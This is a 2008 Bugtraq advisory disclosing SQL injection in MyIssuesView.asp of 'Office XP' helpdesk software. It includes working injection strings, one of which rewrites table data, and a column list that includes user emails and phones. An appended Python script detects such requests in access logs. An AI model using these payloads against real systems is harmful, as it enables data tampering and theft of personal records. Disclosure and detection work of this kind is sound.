List: bugtraq
Subject: Office XP Remote SQL Injection
From: no-reply () Aria-security ! net
Date: 2008-03-13 17:32:04
Message-ID: 20080313173204.7436.qmail () securityfocus ! com
Aria-Security Team (Persian Security Network)
http://forum.Aria-Security.com (ENGLISH FORUM!)
--------------------------------------------------
Shoutz: Aura, Null, Kinglet
Office XP Remote SQL Injection
Vendor: vso-xp.com
Vulnerable File: MyIssuesView.asp
Original Advisory: http://forum.aria-security.com/showthread.php?p=21
PoC:
MyIssuesView.asp?Issue_ID=[SQL INJECTION]
Examples:
MyIssuesView.asp?Issue_ID=-1%20having%201=1--
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--
List of columns
QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,
QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,
QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,
QIssues.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,
QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,
QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,
QIssues.BrowserAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,
QIssues.CustomFields,QIssues.CloseBy,QIssues.Age
Aria-Security Team
The-0utl4w
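
A defender-side check for the parameter named in the advisory above, added here as an example and not part of the original post: it scans access-log lines for MyIssuesView.asp requests whose Issue_ID is not a plain integer after URL decoding. The log layout, the /helpdesk/ path and the assumption that valid IDs are short non-negative integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines: "client-ip METHOD request-target status" (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 GET /helpdesk/MyIssuesView.asp?Issue_ID=42 200
192.0.2.11 GET /helpdesk/MyIssuesView.asp?Issue_ID=-1%20having%201=1-- 500
192.0.2.12 GET /helpdesk/myissuesview.asp?issue_id=7&Issue_ID=7+or+1=1 200
192.0.2.13 GET /helpdesk/MyIssuesView.asp 200
192.0.2.14 GET /helpdesk/Other.asp?Issue_ID=abc 200
"""

TARGET_PAGE = "myissuesview.asp"   # classic ASP paths are case-insensitive
TARGET_PARAM = "issue_id"          # so are query-string keys
VALID_ID = re.compile(r"[0-9]{1,10}")  # assumption: IDs are short non-negative integers


def suspicious_values(request_target):
    """Return every decoded Issue_ID value that is not a plain integer."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/" + TARGET_PAGE):
        return []
    # keep_blank_values: an empty Issue_ID is not a valid integer either.
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    # Check every occurrence: a duplicated parameter can hide a bad value
    # behind a well-formed one.
    return [value for name, value in pairs
            if name.lower() == TARGET_PARAM and not VALID_ID.fullmatch(value)]


def scan(log_text):
    """Return (client, request_target, bad_values) for each flagged line."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue  # not in the constructed four-field layout
        client, target = fields[0], fields[2]
        bad = suspicious_values(target)
        if bad:
            findings.append((client, target, bad))
    return findings


if __name__ == "__main__":
    for client, target, bad in scan(SAMPLE_LOG):
        print(client, target, bad)
```

The same allow-list (integer only) belongs in the application's handling of Issue_ID, alongside a parameterized query, so the value is never concatenated into SQL.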